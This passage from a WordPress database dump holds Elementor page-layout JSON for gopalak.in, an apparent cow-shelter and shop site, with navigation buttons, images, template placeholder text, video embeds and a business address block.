47f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\",\"id\":1544,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9106,1561,'_elementor_page_assets','a:0:{}'),(9108,1562,'_elementor_edit_mode','builder'),(9109,1562,'_elementor_template_type','wp-page'),(9110,1562,'_elementor_version','3.7.8'),(9111,1562,'_wp_page_template','elementor_canvas'),(9112,1562,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\",\"id\":1544,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the 